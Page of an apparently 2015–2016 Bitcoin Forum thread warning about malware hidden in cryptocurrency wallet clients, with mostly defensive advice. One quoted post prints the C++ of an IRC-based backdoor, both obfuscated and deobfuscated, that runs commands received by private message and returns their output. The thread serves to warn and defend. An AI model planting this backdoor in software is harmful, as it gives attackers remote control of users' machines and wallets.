Bitcoin Forum
October 22, 2019, 03:26:36 PM *
News: 10th anniversary art contest
 
   Home   Help Search Login Register More  
Pages: « 1 2 [3] 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 »
  Print  
Author Topic: Beware of Increasingly Sophisticated Malware Infection Attempts  (Read 164421 times)
groggin
Legendary
*
Offline Offline

Activity: 1854
Merit: 1001



View Profile
August 27, 2015, 08:14:06 PM
 #41

I have also noticed, I was unable to download one of the cryptocurrency cores as it was flagged up as being harmful by norton internet security! This is highly likely with all of the cryptocurrency cores as they are open source which means nothing is protecting them from being hacked and placed onto the cryptocurrency's website in order to attack the computers of many users!

  if programs are open source then you can look at the code yourself, to see whether or not it is malicious. try that with windows or any other closed-source executable

loose the sword that is your pen or tongue [or bittorrent enabled computer] and help fight the so-called new world order   it is the enemy of humanity[/b][/url]  |  Sign-up @ Aurovine to get FREE HD music ... and coins!| |
1571757996
Hero Member
*
Offline Offline

Posts: 1571757996

View Profile Personal Message (Offline)

Ignore
1571757996
Reply with quote  #2

1571757996
Report to moderator
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise here.
1571757996
Hero Member
*
Offline Offline

Posts: 1571757996

View Profile Personal Message (Offline)

Ignore
1571757996
Reply with quote  #2

1571757996
Report to moderator
1571757996
Hero Member
*
Offline Offline

Posts: 1571757996

View Profile Personal Message (Offline)

Ignore
1571757996
Reply with quote  #2

1571757996
Report to moderator
jackg
Copper Member
Legendary
*
Offline Offline

Activity: 1526
Merit: 1323


https://bit.ly/2FR9nyn - free python tutorials


View Profile
August 27, 2015, 08:26:49 PM
 #42

I have also noticed, I was unable to download one of the cryptocurrency cores as it was flagged up as being harmful by norton internet security! This is highly likely with all of the cryptocurrency cores as they are open source which means nothing is protecting them from being hacked and placed onto the cryptocurrency's website in order to attack the computers of many users!

  if programs are open source then you can look at the code yourself, to see whether or not it is malicious. try that with windows or any other closed-source executable

I'm not great at reading binary code: as that is what the .exe extension usually means, is there a better way to read programms

BitcoinNewsMagazine
Legendary
*
Offline Offline

Activity: 1582
Merit: 1115



View Profile WWW
August 27, 2015, 08:38:14 PM
 #43

How to keep your home computer malware free.
 
How could it happen?
Clicking a link or attachment in email.
Visiting a website that has malware installed. Depending on your browser settings and what plug-ins you have installed (Flash, Java, Acrobat Reader) malicious software could be installed on your computer without out you knowledge.
 
What could happen?
You could loose all the data on your computer.
All the data on your computer could be held for ransom.
Your computer could be used to commit crimes.
Your personal information could be stolen.
Someone could access all of your accounts.
Someone could log everything you type.
Someone could access all the files on your computer.
 
Prevention
Update your operating system and third party applications.
http://secunia.com/vulnerability_scanning/personal/
 
Disable auto run for Plug-Ins
In Google Chrome navigate to chrome://settings/content.
Under Plug-ins select Click to play.
You can add exceptions by going to chrome://settings/content, Plug-ins, and clicking "Manage exceptions..."
 
Use a DNS server that blocks known malicious sites
Symantec https://dns.norton.com/
Comodo https://www.comodo.com/secure-dns/
 
Use Windows Defender on Windows 8 or Microsoft Security Essentials on Windows 7
They are free and affective.
 
Buy and install MalwareBytes Premium and Malware Bytes Anti-Exploit Premium ($25 Each)
 
Be suspicious about links and attachments in emails. Don't click them.
 
Backup your data
Use BitTorrent Sync to sync your data with another computer.
Use and application like Acronis TruImage to make a scheduled backup to an external drive. Get two external drives and rotate them regularly. Keep one copy at a different location.
Use a cloud based backup service like Carbonite, Crashplan or Backblaze.
 
Consider replacing your current router with with a UTM (Unified Threat Management) firewall that has security software built in. Note that most of these are relatively expensive and require ongoing subscriptions.
Example http://www.asus.com/support/FAQ/1008719/

Be careful with remote access to your PC
Don't use VNC to remotely access your PC. Passwords are easily brute forced via automated scanning scripts. For best security consider two-factor authentication.

Good advice to take to heart, thanks for taking the time to post.

groggin
Legendary
*
Offline Offline

Activity: 1854
Merit: 1001



View Profile
August 27, 2015, 10:42:49 PM
 #44

I have also noticed, I was unable to download one of the cryptocurrency cores as it was flagged up as being harmful by norton internet security! This is highly likely with all of the cryptocurrency cores as they are open source which means nothing is protecting them from being hacked and placed onto the cryptocurrency's website in order to attack the computers of many users!

  if programs are open source then you can look at the code yourself, to see whether or not it is malicious. try that with windows or any other closed-source executable

I'm not great at reading binary code: as that is what the .exe extension usually means, is there a better way to read programms

(disclaimer: i am no expert here)
  source code is human readable, you don't have to be a programmer to look at it, neither do you have to fully understand all the nuances of an executable to see if it might be malicious.

 check out github
https://github.com/explore

wean yourself from Windows if you haven't already
i like to dual-boot: when i start my pc i can choose win or lin. i always prefer linux but sometimes i'm stuck with 'doz
open source is awesome
it is the life blood of digital liberty imo.  Cheesy

 
 

loose the sword that is your pen or tongue [or bittorrent enabled computer] and help fight the so-called new world order   it is the enemy of humanity[/b][/url]  |  Sign-up @ Aurovine to get FREE HD music ... and coins!| |
jackg
Copper Member
Legendary
*
Offline Offline

Activity: 1526
Merit: 1323


https://bit.ly/2FR9nyn - free python tutorials


View Profile
August 28, 2015, 03:14:30 PM
 #45

I have also noticed, I was unable to download one of the cryptocurrency cores as it was flagged up as being harmful by norton internet security! This is highly likely with all of the cryptocurrency cores as they are open source which means nothing is protecting them from being hacked and placed onto the cryptocurrency's website in order to attack the computers of many users!

  if programs are open source then you can look at the code yourself, to see whether or not it is malicious. try that with windows or any other closed-source executable

I'm not great at reading binary code: as that is what the .exe extension usually means, is there a better way to read programms

(disclaimer: i am no expert here)
  source code is human readable, you don't have to be a programmer to look at it, neither do you have to fully understand all the nuances of an executable to see if it might be malicious.

 check out github
https://github.com/explore

wean yourself from Windows if you haven't already
i like to dual-boot: when i start my pc i can choose win or lin. i always prefer linux but sometimes i'm stuck with 'doz
open source is awesome
it is the life blood of digital liberty imo.  Cheesy

 
 

I do quite like linux, I have a raspberry pi b+ which cannot run a lot of operating systems. Is there a way to change the BiOS so that if I have a certain external hard drive connected then it will run from that. I know it is F2 when started up but I don't want to change the factory settings of my laptop

cryptocoinex
Newbie
*
Offline Offline

Activity: 24
Merit: 0


View Profile WWW
December 01, 2015, 08:45:22 AM
 #46

Another pretty save and easy to use program is Deep Freeze.
You can freeze your Windows partition and as soon as you reboot, your pc will go to the state you made when you "freeze" it.
This way no viruses,keyloger,trojans,rats and etc can infect you (as soon as you reboot, the bad staff is gone).
Downside is that you will have to put the block-chain of any coins you use on the second partition of your harddrive (because you will not be able to update the wallet on the windows partition).
Magnesium Coin
Member
**
Offline Offline

Activity: 70
Merit: 10


View Profile
December 07, 2015, 11:54:54 AM
 #47

Won't Norton Internet Security detect the malware if present on a certain wallet?

I have been using NIS (legally bought, not patched) for a long time. Hope it can detect them.

Also they are updating binaries every time with "Virus Definition Updates".

Can anyone confirm the facts by testing any malicious wallet on a PC with NIS previously installed?
HeroCat
Hero Member
*****
Offline Offline

Activity: 658
Merit: 500


View Profile
December 16, 2015, 03:22:50 PM
 #48

Well, BTC hardware wallet protection starts to be very complicated, because trojans, worms also are more developed. Only Linux can help, I think  Wink
groggin
Legendary
*
Offline Offline

Activity: 1854
Merit: 1001



View Profile
December 17, 2015, 01:58:34 PM
 #49

Won't Norton Internet Security detect the malware if present on a certain wallet?

I have been using NIS (legally bought, not patched) for a long time. Hope it can detect them.

Also they are updating binaries every time with "Virus Definition Updates".

Can anyone confirm the facts by testing any malicious wallet on a PC with NIS previously installed?

  malware/virus detectors only foil amateur hackers(period) use sandboxie, and know that some malware can detect being opened in sandboxie... or deep freeze, but the hacker gets your coin anyway ...

 linux is the best bet, go ahead, take the plunge   Cheesy

loose the sword that is your pen or tongue [or bittorrent enabled computer] and help fight the so-called new world order   it is the enemy of humanity[/b][/url]  |  Sign-up @ Aurovine to get FREE HD music ... and coins!| |
ipodtouchdud
Newbie
*
Offline Offline

Activity: 2
Merit: 0


View Profile
December 21, 2015, 03:54:53 PM
 #50

I have heard of dead coins.. is this a scam/malware? I would like to know about them before investing in any type of online currency. Thanks!
siameze
Legendary
*
Offline Offline

Activity: 1064
Merit: 1000



View Profile
January 02, 2016, 04:31:40 PM
 #51

I found this today. Post has since been removed but I managed to screenshot it beforehand and also left negative feedback. A link to the virus total results is included in the feedback.




It wasn't especially sophisticated, nor was it crypted just a basic wallet stealing code that scans PC for private keys. Seems to be targeted at noobs that would get greedy and download without thinking.


                     ▀▀█████████▀████████████████▄
                        ████▄      ▄████████████████
                     ▄██████▀  ▄  ███████████████████
                  ▄█████████▄████▄███████████████████
                ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀████████
                                               ▀▀███▀
    ▄█▀█       ▄▀  ▄▀▀█  ▄▀   █████████████████▄ ██▀         ▄▀█
   ▄█ ▄▀      ▀█▀ █▀ █▀ ▀█▀  ███████████████████ █▀ ▀▀      ▄▀▄▀
  ▄█    ▄███  █     █   █   ████████████████████  ▄█     ▄▀▀██▀ ▄███
███▄▄▄  █▄▄▄ █▄▄ ▄▄▀   █▄▄ ██████████████████▀▀   █▄▄ ▄▄ █▄▄█▄▄▄█▄▄▄
                           ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                            ▀▀█████████████▄
                                █████████████▄
                                  █████████████▄
                                    ▀███████▀▀▀▀▀
                                      ▀████▀
                                        ▀█▀
LetItRideINNOVATIVE ▬▬▬
DICE GAME
                        ▄███████████▄
                       ██  ██████████▄
                     ▄█████████████  ██▄
            ▄▄▀█▄▄▄▄▄████████████████████▄
        ▄▄█▀   ███████████  █████  ████  █
    ▄██████ ▄▄███████████████████████████▀
 ▄▀▀ ██████████████████████████  ████  █
█  ▄███████████▀▀▀█████████████████████
██████████████    ████████▀▀██████  █▀
██████████████▄▄▄██████████   ▀▀▀▀▀▀▀
███▀ ▀██████████████████████
██    ███████████████████████
██▄▄██████████████████████████
██████████████▀   ██████████
  █████████████   ▄██████▀▀
     ▀▀██████████████▀▀
         ▀▀██████▀▀
PROVABLY
F A I R
▄█████████████▀ ▄█
██            ▄█▀
██          ▄██ ▄█
██ ▄█▄    ▄███  ██
██ ▀███▄ ▄███   ██
██  ▀███████    ██
██    █████     ██
██     ███      ██
██      ▀       ██
██              ██
▀████████████████▀
BUY  BACK
PLANS
[BTC]
BitcoinNewsMagazine
Legendary
*
Offline Offline

Activity: 1582
Merit: 1115



View Profile WWW
January 02, 2016, 04:48:58 PM
 #52

Well, BTC hardware wallet protection starts to be very complicated, because trojans, worms also are more developed. Only Linux can help, I think  Wink

Just get a Trezor for your bitcoin. Your private keys will then be safe offline and Trezor works with Windows, Linux and OS X 10.8+

helloeverybody
Legendary
*
Offline Offline

Activity: 1008
Merit: 1000


★YoBit.Net★ 350+ Coins Exchange & Dice


View Profile WWW
January 02, 2016, 04:53:23 PM
 #53

I found this today. Post has since been removed but I managed to screenshot it beforehand and also left negative feedback. A link to the virus total results is included in the feedback.




It wasn't especially sophisticated, nor was it crypted just a basic wallet stealing code that scans PC for private keys. Seems to be targeted at noobs that would get greedy and download without thinking.

off topic slightly but You dont happen to know the name of a program i can use that will scan all my hard disk drives for wallets do you? Would be handy if it also finds dash wallets because ive got at least 1 wallet on my hdd somewhere that ive completely lost.

siameze
Legendary
*
Offline Offline

Activity: 1064
Merit: 1000



View Profile
January 02, 2016, 04:54:01 PM
 #54

Well, BTC hardware wallet protection starts to be very complicated, because trojans, worms also are more developed. Only Linux can help, I think  Wink

Just get a Trezor for your bitcoin. Your private keys will then be safe offline and Trezor works with Windows, Linux and OS X 10.8+

There are clever hacks for a trezor as well, nothing is 100% safe so don't get lulled into a false sense of security. See: http://www.hackinsight.org/news,303.html

Granted, that is a particular version of firmware but as wih any device that stores "money" there will always be people looking for the loopholes. A dedicated attacker only needs a small window of time to make your funds vanish.


                     ▀▀█████████▀████████████████▄
                        ████▄      ▄████████████████
                     ▄██████▀  ▄  ███████████████████
                  ▄█████████▄████▄███████████████████
                ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀████████
                                               ▀▀███▀
    ▄█▀█       ▄▀  ▄▀▀█  ▄▀   █████████████████▄ ██▀         ▄▀█
   ▄█ ▄▀      ▀█▀ █▀ █▀ ▀█▀  ███████████████████ █▀ ▀▀      ▄▀▄▀
  ▄█    ▄███  █     █   █   ████████████████████  ▄█     ▄▀▀██▀ ▄███
███▄▄▄  █▄▄▄ █▄▄ ▄▄▀   █▄▄ ██████████████████▀▀   █▄▄ ▄▄ █▄▄█▄▄▄█▄▄▄
                           ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                            ▀▀█████████████▄
                                █████████████▄
                                  █████████████▄
                                    ▀███████▀▀▀▀▀
                                      ▀████▀
                                        ▀█▀
LetItRideINNOVATIVE ▬▬▬
DICE GAME
                        ▄███████████▄
                       ██  ██████████▄
                     ▄█████████████  ██▄
            ▄▄▀█▄▄▄▄▄████████████████████▄
        ▄▄█▀   ███████████  █████  ████  █
    ▄██████ ▄▄███████████████████████████▀
 ▄▀▀ ██████████████████████████  ████  █
█  ▄███████████▀▀▀█████████████████████
██████████████    ████████▀▀██████  █▀
██████████████▄▄▄██████████   ▀▀▀▀▀▀▀
███▀ ▀██████████████████████
██    ███████████████████████
██▄▄██████████████████████████
██████████████▀   ██████████
  █████████████   ▄██████▀▀
     ▀▀██████████████▀▀
         ▀▀██████▀▀
PROVABLY
F A I R
▄█████████████▀ ▄█
██            ▄█▀
██          ▄██ ▄█
██ ▄█▄    ▄███  ██
██ ▀███▄ ▄███   ██
██  ▀███████    ██
██    █████     ██
██     ███      ██
██      ▀       ██
██              ██
▀████████████████▀
BUY  BACK
PLANS
[BTC]
presstab
Legendary
*
Offline Offline

Activity: 1330
Merit: 1000


Blockchain Developer


View Profile
January 15, 2016, 05:32:09 AM
 #55

And this is what allegedly brings down Cryptsy...

Projects I Contribute To: libzerocoin | Veil | PIVX | HyperStake | Crown | SaluS
dooglus
Legendary
*
Offline Offline

Activity: 2730
Merit: 1207



View Profile
January 15, 2016, 05:49:28 AM
 #56

And this is what allegedly brings down Cryptsy...

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

[...]

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

But an IRC backdoor would only work on online machines, not cold wallets. Are exchanges still not keeping the majority of their bitcoins offline?

Just-Dice                 ██             
          ██████████         
      ██████████████████     
  ██████████████████████████ 
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
    ██████████████████████   
        ██████████████       
            ██████           
   Play or Invest                 ██             
          ██████████         
      ██████████████████     
  ██████████████████████████ 
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
    ██████████████████████   
        ██████████████       
            ██████           
   1% House Edge
capcher
Full Member
***
Offline Offline

Activity: 224
Merit: 100

This user is currently ignored.


View Profile
January 16, 2016, 12:09:17 PM
 #57

But an IRC backdoor would only work on online machines, not cold wallets. Are exchanges still not keeping the majority of their bitcoins offline?

Apparently not Cryptsy. They lost 13,000 BTC and 300,000 LTC because of the Lucky7Coin trojan.
jackg
Copper Member
Legendary
*
Offline Offline

Activity: 1526
Merit: 1323


https://bit.ly/2FR9nyn - free python tutorials


View Profile
January 31, 2016, 01:58:26 PM
 #58

There was apparently a coin that had a malicious virus in its client software.
It was AvatarCoin and the wallet tried to duplicate the .dat wallet files onto the scammers Server so that he could take all of the coins from them wallets and sell them.

The avatarcoin scam, even included an avatar campaign of 8000AV to every user who joined the campaign and stopped paying around January 8th.

Hippie Tech
aka Amenstop
Legendary
*
Offline Offline

Activity: 1624
Merit: 1001


All cryptos are FIAT digital currency. Do not use.


View Profile WWW
January 31, 2016, 02:44:55 PM
 #59

But an IRC backdoor would only work on online machines, not cold wallets. Are exchanges still not keeping the majority of their bitcoins offline?

Apparently not Cryptsy. They lost 13,000 BTC and 300,000 LTC because of the Lucky7Coin trojan.

That what you see there is a red herring. Wink
https://en.wikipedia.org/wiki/Red_herring

https://bitcointalk.org/index.php?topic=1173703.msg13729914#msg13729914

Bitcoin_Delivery
Hero Member
*****
Offline Offline

Activity: 952
Merit: 500



View Profile
February 29, 2016, 05:13:50 PM
 #60

WARNING !! This client is making outbound connections to known malware and/or phishing sites.


http://www.urlquery.net/report.php?id=1434020970582

The "Recent reports on same IP/ASN/Domain" section shows other suspicious sites/links.
https://www.virustotal.com/en/url/946ac3207509fb493eaf2e02e107b97cc03513cb373bb007a8a61b9b6b0fe61c/analysis/1434120962/

Now lets see what the debug.log has to say...
Code:
2015-06-12 12:41:10 connection timeout
2015-06-12 12:41:11 trying connection 77.249.89.46:9748 lastseen=1802.3hrs
2015-06-12 12:41:16 connection timeout
2015-06-12 12:41:17 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:41:22 connection timeout
2015-06-12 12:41:22 trying connection 82.238.124.41:9748 lastseen=33.6hrs
2015-06-12 12:41:27 connection timeout
2015-06-12 12:41:28 trying connection 77.85.35.151:9748 lastseen=170.7hrs
2015-06-12 12:41:33 connection timeout
2015-06-12 12:41:33 trying connection 137.135.57.119:9748 lastseen=27.6hrs
2015-06-12 12:41:38 connection timeout
2015-06-12 12:41:39 trying connection 96.54.4.190:9748 lastseen=21.7hrs
2015-06-12 12:41:44 connection timeout
2015-06-12 12:41:44 trying connection 87.154.210.76:9748 lastseen=378.8hrs
2015-06-12 12:41:49 connection timeout
2015-06-12 12:41:50 trying connection 103.230.107.12:9748 lastseen=2166.3hrs
2015-06-12 12:41:55 connection timeout
2015-06-12 12:41:55 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:00 connection timeout
2015-06-12 12:42:01 trying connection 62.157.39.12:9748 lastseen=2675.3hrs
2015-06-12 12:42:06 connection timeout
2015-06-12 12:42:06 trying connection 71.100.135.84:9748 lastseen=16.9hrs
2015-06-12 12:42:11 connection timeout
2015-06-12 12:42:12 trying connection 162.255.117.105:9748 lastseen=52.5hrs
2015-06-12 12:42:17 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:22 connection timeout
2015-06-12 12:42:23 trying connection 71.100.135.84:9748 lastseen=16.9hrs
2015-06-12 12:42:28 connection timeout
2015-06-12 12:42:28 trying connection 5.139.143.81:9748 lastseen=3461.6hrs
2015-06-12 12:42:33 connection timeout
2015-06-12 12:42:34 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:39 connection timeout
2015-06-12 12:42:39 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:44 connection timeout
2015-06-12 12:42:45 trying connection 87.154.214.25:9748 lastseen=2063.7hrs
2015-06-12 12:42:50 connection timeout
************************************************************
2015-06-12 12:42:50 trying connection 104.219.250.234:9748 lastseen=7.2hrs**
************************************************************
2015-06-12 12:42:55 connection timeout
2015-06-12 12:42:56 trying connection 80.57.229.215:9748 lastseen=115.2hrs
2015-06-12 12:43:01 connection timeout
2015-06-12 12:43:01 trying connection 77.232.5.253:9748 lastseen=1191.0hrs

Report for the address, 104.xxx.xxx.234, :
http://www.urlquery.net/report.php?id=1434121818636

And one of it's suspicious links/sites :
https://www.virustotal.com/en/url/3b1a7af045bdc8005e8243f65d203df04ba8d43f9e10fd39af1004aad75da0ed/analysis/1434122387/

Then from this screenshot lookS like Geocoin (and then all his clone) have malicious code in it...or I'm wrong?
What can we do to inspect the source of coins looking for malicious code and prevent this kind of things?
Pages: « 1 2 [3] 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 »
  Print  
 
Jump to:  

Sponsored by , a Bitcoin-accepting VPN.
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!